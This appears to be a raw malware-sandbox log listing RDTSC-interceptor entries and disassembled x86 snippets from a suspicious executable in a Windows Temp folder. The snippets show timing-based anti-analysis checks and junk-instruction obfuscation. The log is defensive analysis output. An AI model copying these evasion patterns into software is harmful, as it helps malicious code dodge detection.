Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50ED1E second address: 50EDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 4B430E72h 0x0000000d mov edx, dword ptr [ebp+122D3347h] 0x00000013 push 00000003h 0x00000015 sub edx, 55098AB1h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F29F0C52758h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D3A08h], ebx 0x0000003d push 00000003h 0x0000003f sub edi, 60689B98h 0x00000045 push AD70B887h 0x0000004a pushad 0x0000004b js 00007F29F0C52758h 0x00000051 jl 00007F29F0C5275Ch 0x00000057 popad 0x00000058 xor dword ptr [esp], 6D70B887h 0x0000005f mov ecx, dword ptr [ebp+122D2BD7h] 0x00000065 lea ebx, dword ptr [ebp+1245F833h] 0x0000006b jg 00007F29F0C5275Ah 0x00000071 mov cx, 7675h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F29F0C5275Fh 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 520009 second address: 52000D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52000D second address: 520013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 520013 second address: 52002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 506758 second address: 50676F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F29F0C52762h 0x0000000f jno 00007F29F0C52756h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50676F second address: 506779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 506779 second address: 50677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50677D second address: 506799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52DB81 second address: 52DB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E112 second address: 52E11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E11A second address: 52E11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E11E second address: 52E122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E2BC second address: 52E2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E2C1 second address: 52E2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E2C7 second address: 52E2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F29F0C52756h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E594 second address: 52E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F29F0CD5296h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E6EA second address: 52E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52E6F0 second address: 52E6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EA42 second address: 52EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29F0C52756h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EA4C second address: 52EA78 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b jne 00007F29F0CD52BCh 0x00000011 jmp 00007F29F0CD52A8h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EA78 second address: 52EA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EBB0 second address: 52EBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F29F0CD52A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EBCE second address: 52EBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52ED5E second address: 52ED76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52ED76 second address: 52ED82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52ED82 second address: 52ED8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52ED8E second address: 52ED98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52EECE second address: 52EED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52F46E second address: 52F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52F5C8 second address: 52F5DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F29F0CD5296h 0x0000000d jc 00007F29F0CD5296h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52F5DC second address: 52F5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F29F0C52756h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 52F73D second address: 52F752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007F29F0CD5296h 0x00000014 popad 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F752 second address: 52F771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pushad 0x00000008 jnc 00007F29F0C52756h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F771 second address: 52F777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F89D second address: 52F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532416 second address: 532423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532423 second address: 532427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532427 second address: 53242D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53242D second address: 532437 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C5275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532437 second address: 53244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F29F0CD529Fh 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1BC second address: 53C1CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29F0C5275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1CE second address: 53C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1D2 second address: 53C1F2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F29F0C52762h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1F2 second address: 53C1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C355 second address: 53C36D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C36D second address: 53C376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8C3 second address: 53C8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8D3 second address: 53C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8D7 second address: 53C8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8DD second address: 53C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F29F0CD529Ch 0x0000000c jnc 00007F29F0CD5296h 0x00000012 jmp 00007F29F0CD52A2h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D8EC second address: 53D909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F29F0C52758h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D909 second address: 53D90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D90D second address: 53D942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F29F0C52756h 0x00000013 jl 00007F29F0C52756h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F29F0C52769h 0x00000021 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D942 second address: 53D972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007F29F0CD529Eh 0x00000012 push ebx 0x00000013 jno 00007F29F0CD5296h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ebx 0x0000001f pushad 0x00000020 jnp 00007F29F0CD5296h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D972 second address: 53D9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F29F0C52758h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 movsx edi, si 0x00000024 push AE00AB7Bh 0x00000029 push eax 0x0000002a push edx 0x0000002b jnl 00007F29F0C5275Ch 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E89F second address: 53E8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E8A4 second address: 53E8A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E8A9 second address: 53E8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E9EE second address: 53E9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EAA3 second address: 53EAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EF94 second address: 53EF99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EF99 second address: 53EFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov edi, dword ptr [ebp+122D2A7Fh] 0x0000000f mov dword ptr [ebp+122D2685h], edi 0x00000015 popad 0x00000016 push 00000000h 0x00000018 jmp 00007F29F0CD529Ah 0x0000001d push 00000000h 0x0000001f call 00007F29F0CD529Ch 0x00000024 xor di, B8DBh 0x00000029 pop esi 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EFD6 second address: 53EFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EFDE second address: 53EFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0CD5296h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F29F0CD529Ch 0x00000014 pop edi 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F932 second address: 53F937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F7D3 second address: 53F7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F937 second address: 53F9AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29F0C5275Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F29F0C52760h 0x00000010 nop 0x00000011 mov esi, dword ptr [ebp+122D2B57h] 0x00000017 push 00000000h 0x00000019 mov di, 11BEh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F29F0C52758h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 or edi, dword ptr [ebp+122D2ACFh] 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F29F0C52767h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F7D8 second address: 53F7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F9AA second address: 53F9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 540A1D second address: 540A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 540A22 second address: 540A27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B13 second address: 542B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D231Eh], esi 0x0000000c push 00000000h 0x0000000e pushad 0x0000000f call 00007F29F0CD52A6h 0x00000014 jmp 00007F29F0CD529Fh 0x00000019 pop ecx 0x0000001a xor cx, 78A4h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 xor esi, dword ptr [ebp+122D2C47h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B5C second address: 542B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B61 second address: 542B73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F29F0CD5296h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 541CF2 second address: 541CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 544021 second address: 544025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
